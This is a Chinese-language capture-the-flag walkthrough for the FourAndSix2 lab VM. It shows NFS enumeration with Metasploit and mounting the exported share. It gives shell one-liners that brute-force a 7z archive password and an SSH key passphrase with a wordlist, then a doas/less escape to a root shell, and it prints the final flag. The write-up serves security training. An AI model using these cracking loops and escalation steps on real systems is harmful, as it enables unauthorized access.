0x01 簡介
FourAndSix2是易受攻擊的一個靶機,主要任務是通過入侵進入到目標靶機系統然后提權,並在root目錄中並讀取flag.tx信息
FourAndSix2.鏡像下載地址:
0x02 信息收集
1.通過存活主機發現,確定目標機器IP
2.端口掃描發現
3.發現開放nfs服務,搜索漏洞利用代碼
0x03 漏洞利用
msf5 > search nfs
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/freebsd/nfsd/nfsd_mount normal No FreeBSD Remote NFS RPC Request Denial of Service
1 auxiliary/scanner/nfs/nfsmount normal Yes NFS Mount Scanner
2 exploit/netware/sunrpc/pkernel_callit 2009-09-30 good No NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow
3 exploit/osx/local/nfs_mount_root 2014-04-11 normal Yes Mac OS X NFS Mount Privilege Escalation Exploit
4 exploit/windows/ftp/labf_nfsaxe 2017-05-15 normal No LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow
5 exploit/windows/ftp/xlink_client 2009-10-03 normal No Xlink FTP Client Buffer Overflow
6 exploit/windows/ftp/xlink_server 2009-10-03 good Yes Xlink FTP Server Buffer Overflow
7 exploit/windows/nfs/xlink_nfsd 2006-11-06 average No Omni-NFS Server Buffer Overflow
msf5 > use auxiliary/scanner/nfs/nfsmount
msf5 auxiliary(scanner/nfs/nfsmount) > show options
Module options (auxiliary/scanner/nfs/nfsmount):
Name Current Setting Required Description
---- --------------- -------- -----------
PROTOCOL udp yes The protocol to use (Accepted: udp, tcp)
RHOSTS yes The target address range or CIDR identifier
RPORT 111 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/nfs/nfsmount) > set rhosts 192.168.190.134
rhosts => 192.168.190.134
msf5 auxiliary(scanner/nfs/nfsmount) > run
[+] 192.168.190.134:111 - 192.168.190.134 NFS Export: /home/user/storage []
[*] 192.168.190.134:111 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/nfs/nfsmount) >
查看目標系統可掛載目錄
或者使用showmount -e 192.168.190.134 查看目標系統可掛載目錄
mount -t nfs 192.168.190.134:/home/user/storage /mnt # 將目標機器/home/user/storage掛載本地
發現備份文件
7z解壓:
# 7z e yajiu.7z --- 不實用
這條命令是將yajiu.7z中的所有文件解壓出來,e是解壓到當前路徑
# 7z x yajiu.7z --- 正確的解壓方法
這條命令是將yajiu.7z中的所有文件解壓出來,x是解壓到壓縮包命名的目錄下
使用 7z x backup.7z 解壓備份文件 ,居然提示需要密碼$$
2.壓縮包爆破
root@kali:/mnt# rar
rar2john rarp rarun2
root@kali:/mnt# rar
rar2john rarp rarun2
root@kali:/mnt# apt-get install rarcrack
rarcrack使用方法
執行命令: rarcrack 文件名 --threads 線程數 --type rar|zip|7z
也可以使用7z破解腳本
https://github.com/exexute/PythonScaffold/tree/PythonScaffold_0.1/enum_violence/file_enum
Usage:
./7z-crack.sh <target_file.7z> <wordlist_file>
Example:
./7z-crack.sh /tmp/backup.7z /usr/share/wordlists/rockyou.txt
How to use id_rsa-crack.sh?
Usage:
./id_rsa-crack.sh <target_file> <wordlist_file>
Example:
./id_rsa-crack.sh /tmp/id_rsa /usr/share/wordlists/rouckyou.txt
7z-crack.sh腳本:
cat $2 | while read line;do if 7z e $1 -p"$line" 1>/dev/null 2>/dev/null;then echo "FOUND PASSWORD:"$line;break;fi;done
破解出了密碼:chocolate
解壓出來一堆HelloKitty,還有一對公鑰(id_rsa.pub)和私鑰(id_rsa)。
通過查看公鑰找到用戶名,將私鑰拷貝到/root/.ssh目錄,嘗試使用RSA私鑰登錄
無法登錄,還需要輸入密碼
使用id_rsa-crack.sh工具破解id_rsa文件的密碼
id_rsa-crack.sh腳本:
cat /usr/share/wordlists/rockyou.txt | while read line;do if ssh-keygen -p -P $line -N $line -f /tmp/test/id_rsa 1>/dev/null 2>/dev/null;then echo "PASSWORD FOUND : "$line;break;fi;done;
使用ssh登錄目標機器后發現目標系統是OpenBSD6.4,
搜索未發現6.4內核存在提權漏洞。
使用find命令來定位設置了SUID的文件
find / -perm -u=s -type f 2>/dev/null
doas是BSD系列系統下的權限管理工具,類似於Debian系列下的sudo命令,我們可以利用它來提權
查看doas的配置文件doas.conf,可以看到doas 允許用戶以root權限通過less 查看/var/log/authlog日志文件
fourandsix2$ cat doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
doas /usr/bin/less /var/log/authlog
使用doas查看到日志信息,此時按v進行編輯模式,退出編輯模式,輸入!/bin/sh提升到root權限
在root目錄下發現flag.txt,acd043bc3103ed3dd02eee99d5b0ff42
